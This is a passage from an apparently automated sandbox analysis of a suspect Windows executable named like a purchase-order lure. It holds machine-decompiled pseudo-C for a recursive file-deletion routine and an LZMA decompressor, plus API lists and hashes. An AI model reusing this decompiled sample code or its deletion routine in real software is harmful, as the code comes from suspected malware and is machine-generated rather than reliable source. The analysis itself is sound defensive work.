									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                            0x004059fa
                                                                            0x004059ff
                                                                            0x00405a08
                                                                            0x00405a0b
                                                                            0x00405a13
                                                                            0x00405a16
                                                                            0x00405a19
                                                                            0x00405a21
                                                                            0x00405a23
                                                                            0x00405a24
                                                                            0x00000000
                                                                            0x00405a24
                                                                            0x00405a2f
                                                                            0x00405a32
                                                                            0x00405a32
                                                                            0x00405a32
                                                                            0x00405a36
                                                                            0x00405a49
                                                                            0x00405a50
                                                                            0x00405a55
                                                                            0x00405a59
                                                                            0x00405a69
                                                                            0x00405a5b
                                                                            0x00405a61
                                                                            0x00405a61
                                                                            0x00405a6e
                                                                            0x00405a71
                                                                            0x00405a7c
                                                                            0x00405a82
                                                                            0x00405a87
                                                                            0x00405a97
                                                                            0x00405a99
                                                                            0x00405a9f
                                                                            0x00405aa2
                                                                            0x00405aa5
                                                                            0x00405b5d
                                                                            0x00405b5d
                                                                            0x00405b61
                                                                            0x00405b63
                                                                            0x00405b63
                                                                            0x00405b63
                                                                            0x00405b63
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405aab
                                                                            0x00405aab
                                                                            0x00405ab4
                                                                            0x00405aba
                                                                            0x00405abf
                                                                            0x00405ac2
                                                                            0x00405ac4
                                                                            0x00405ac8
                                                                            0x00405aca
                                                                            0x00405aca
                                                                            0x00405ac8
                                                                            0x00405acd
                                                                            0x00405ad0
                                                                            0x00405ae3
                                                                            0x00405ae5
                                                                            0x00405aea
                                                                            0x00405af1
                                                                            0x00405b0c
                                                                            0x00405b11
                                                                            0x00405b13
                                                                            0x00405b37
                                                                            0x00405b15
                                                                            0x00405b15
                                                                            0x00405b18
                                                                            0x00405b2c
                                                                            0x00405b1a
                                                                            0x00405b1d
                                                                            0x00405b25
                                                                            0x00405b25
                                                                            0x00405b18
                                                                            0x00405af3
                                                                            0x00405af9
                                                                            0x00405afb
                                                                            0x00405b01
                                                                            0x00405b01
                                                                            0x00405afb
                                                                            0x00000000
                                                                            0x00405af1
                                                                            0x00405ad2
                                                                            0x00405ad5
                                                                            0x00405ad7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ad9
                                                                            0x00405adb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405add
                                                                            0x00405ae1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b3c
                                                                            0x00405b46
                                                                            0x00405b4c
                                                                            0x00405b4c
                                                                            0x00405b57
                                                                            0x00000000
                                                                            0x00405b57
                                                                            0x00405a73
                                                                            0x00405a7a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405a38
                                                                            0x00405a38
                                                                            0x00405a3a
                                                                            0x00405b67
                                                                            0x00405b69
                                                                            0x00405b6c
                                                                            0x00405bbd
                                                                            0x00405bbd
                                                                            0x00405bbd
                                                                            0x00405b6e
                                                                            0x00405b71
                                                                            0x00405b7c
                                                                            0x00405b81
                                                                            0x00405b83
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b86
                                                                            0x00405b92
                                                                            0x00405b97
                                                                            0x00405b99
                                                                            0x00000000
                                                                            0x00405bb4
                                                                            0x00405b9b
                                                                            0x00405b9e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ba3
                                                                            0x00000000
                                                                            0x00405baa
                                                                            0x00405b73
                                                                            0x00405b73
                                                                            0x00000000
                                                                            0x00405b73
                                                                            0x00405a40
                                                                            0x00405a43
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405a43

                                                                            APIs
                                                                            • DeleteFileA.KERNELBASE(?,?,74B5FA90,74B5F560,00000000), ref: 00405A19
                                                                            • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A61
                                                                            • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A82
                                                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A88
                                                                            • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A99
                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                                                            • FindClose.KERNEL32(00000000), ref: 00405B57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\PO_29_00412.exe" $\*.*
                                                                            • API String ID: 2035342205-3995466456
                                                                            • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                                            • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                                                            • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                                            • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
